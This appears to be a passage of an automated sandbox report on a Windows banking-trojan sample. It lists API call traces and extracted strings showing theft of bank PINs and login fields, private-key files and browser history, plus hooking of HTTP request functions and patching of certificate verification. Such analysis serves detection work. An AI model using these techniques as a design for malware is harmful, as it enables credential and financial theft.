                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions
                                                                                                                                                                                                            • API String ID: 3028510665-1934172683
                                                                                                                                                                                                            • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: \*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                            • API String ID: 3912299499-4244443412
                                                                                                                                                                                                            • Opcode ID: 7dc39609dfe1e57259c0eb4d3c3afd5e23a8bfd35c12383665a208dd8501722a
                                                                                                                                                                                                            • Instruction ID: 26a030f6808de7b4fa85e084009c030c8c6ee34e8dcc56370cb090970b671dd4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dc39609dfe1e57259c0eb4d3c3afd5e23a8bfd35c12383665a208dd8501722a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1E128B0D002599FCB51CFA8D950AEEBBF4EF49340F1085AAD989E7211E7309658CF94
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: open$taskmgr
                                                                                                                                                                                                            • API String ID: 0-1543563666
                                                                                                                                                                                                            • Opcode ID: 15e945cbe132f86f3e11249d526d98a4be182aae20b1085cc2cf3109d49ce851
                                                                                                                                                                                                            • Instruction ID: 272cdda21bc424d3c8aca68ecd098868caaba4cba710364516bec1732888b816
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15e945cbe132f86f3e11249d526d98a4be182aae20b1085cc2cf3109d49ce851
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4691F731E40205EBC720DF68EC88FFA7768EF49356F444A95FA1597291C7B19C21CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD20EE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD212F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD216B
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2180
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD218A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2192
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD21A3
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD21AA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD21E2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BD21EF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C,?,?), ref: 02BD2237
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1668326001-879465215
                                                                                                                                                                                                            • Opcode ID: 28a3a3bd2fd30a7156ce57358e0d152d05d2da9b3f76370a49c8e79bf795301b
                                                                                                                                                                                                            • Instruction ID: a9bba2da42309262e22d092e927aad61981a3ccbe6cfdc271fbfd76bacc4aa35
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28a3a3bd2fd30a7156ce57358e0d152d05d2da9b3f76370a49c8e79bf795301b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD7124309407859FDB618B389C98BEA7BE8EF45740F5489D4FAC5D7242EB709984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1B8F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD1B96
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD1BA3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02BD1BCD
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BD1BF2
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02BC8A50), ref: 02BD1C0F
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BD1C29
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BD1C33
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02BD1C3E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD1C45
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD1C53
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1C64
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                            • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                            • API String ID: 532458909-2725162336
                                                                                                                                                                                                            • Opcode ID: 41d7b5584d328bfcd5da66bf941e12041d3a1e58055b6381d94a7867e23f73f5
                                                                                                                                                                                                            • Instruction ID: 4b66ed6bf3828670c468bd11d27ae282904578014eca3dcf8c952f234d9b90d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41d7b5584d328bfcd5da66bf941e12041d3a1e58055b6381d94a7867e23f73f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E251E831A402096BDB259F7C9C98BEF7BA9EF45785F048594FA4AD7100FB70E94487A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,76F8F550,00000000), ref: 02BC11AE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02BC11C4
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,76F91620), ref: 02BC11DC
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02BC11FE
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02BC120A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02BC1220
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02BC123C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02BC1258
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02BC1274
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02BC1290
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02BC12AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02BC12C8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02BC12E4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02BC1300
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                            • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                            • API String ID: 1705253364-835984666
                                                                                                                                                                                                            • Opcode ID: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                            • Instruction ID: f4f6018f828fddebdedf03968135cdc2f13fb75721a995a6c7ad327438100f9c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8631C374B9070A75FA607A794C02F6F235D8F40E84F3005D8BA46F61A7DBE5E6058978
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD01BE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C878), ref: 02BD01EB
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD022D
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD0233
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD023B
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD024C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD0253
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C878,?,?), ref: 02BD02C7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD0305
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$path.txt
                                                                                                                                                                                                            • API String ID: 2217318736-1213179079
                                                                                                                                                                                                            • Opcode ID: 60a779e99890db1d6ae89f07a9b9decff208815826d2672d054b2691a6203492
                                                                                                                                                                                                            • Instruction ID: 5a0345a2d2781055f3560d8dd16b069c15648128d234aa319462c27b37eac927
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60a779e99890db1d6ae89f07a9b9decff208815826d2672d054b2691a6203492
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5711830A447155FDB619B389858BEB7FE8EF45380F4489D4EAC6D7241EB70DA44CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02BCF05D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF09E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF0D2
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF0E7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF0F1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF0F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF10A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF111
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF14B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCF158
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670,02BFFDB8,02BFFDB9), ref: 02BCF199
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF1D4
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF1DE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF1E6
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF1F7
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF1FE
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF23B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCF248
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF420,02BFFDB8,00000000,00000000), ref: 02BCF27E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCF296
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF2A7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                            • String ID: pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                            • API String ID: 448721894-2830610617
                                                                                                                                                                                                            • Opcode ID: 9aaccd441b12b2bd9061399a32deaf654488722b8d8a7aa4e16a6551caae80cb
                                                                                                                                                                                                            • Instruction ID: a40e008f5cdfc6789f2f42f2f1a239d3e3b5d395a1176d1a2df148f7235146ba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aaccd441b12b2bd9061399a32deaf654488722b8d8a7aa4e16a6551caae80cb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC712535A402059FDB218F38D858BFA7BE9EF45740F5486DAFA85C7240DB70DA45CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02BB4987
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A43
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4A4F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4A64
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4A74
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A88
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4A94
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4AA8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4AB6
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB4AD5
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BB4AEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                            • API String ID: 757183407-427538202
                                                                                                                                                                                                            • Opcode ID: aca6b1c0fc6e2d39b412efee17ca00d00b3818a49d0a57af8e359a25e5891054
                                                                                                                                                                                                            • Instruction ID: 128cfb9fd8ca8817552295f07d93c77e22fed18d1774453d0adf77548755c5d3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aca6b1c0fc6e2d39b412efee17ca00d00b3818a49d0a57af8e359a25e5891054
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF516771A81308BBFB309B949C4AFEEBB78EF45B44F504544F701AA1C1D7F06A548BA9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCD278
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02BCD293
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02BCD2AE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCD2D4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD30E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCD318
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCD320
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD32F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCD336
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260,?,?), ref: 02BCD3D9
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD413
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCD41D
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCD425
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD434
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCD43B
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 02BCD52F
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                            • String ID: .txt$.zip$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 2233314381-1344788171
                                                                                                                                                                                                            • Opcode ID: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                            • Instruction ID: b56ec25e905ebdfc358b44389a83a9ed3b9076637d492f3544f602d54e6bf4fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1491F7345087468FCB25CB3894686ABBBE5EFC9345F188AACF9C6C7201EB31D549C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4037
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD4075
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD407F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD4087
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD4098
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD409F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,?), ref: 02BD40FD
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02BD410C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4137
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4197
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                            • API String ID: 2433436401-604994656
                                                                                                                                                                                                            • Opcode ID: 491535aba9c8b8beaa6177f383d04749ad2ffc5c9aa6108b28f580c5205ca074
                                                                                                                                                                                                            • Instruction ID: d1b68cb65edd705c3b9f1cdcbce307dcf471cd9f3526383d3e65103712062aab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 491535aba9c8b8beaa6177f383d04749ad2ffc5c9aa6108b28f580c5205ca074
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACB1FD3090064A5BDB2ACB7C98697FA7BF5FF49340F1489E4E996D7240FB719948C740
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                              • Part of subcall function 02BBD970: GetComputerNameA.KERNEL32(02BFF588,?), ref: 02BBD987
                                                                                                                                                                                                              • Part of subcall function 02BBD970: lstrlenA.KERNEL32(02BFF588,?,?,02BC76EC), ref: 02BBD992
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9D2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9E2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9F2
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9FF
                                                                                                                                                                                                              • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBDA0C
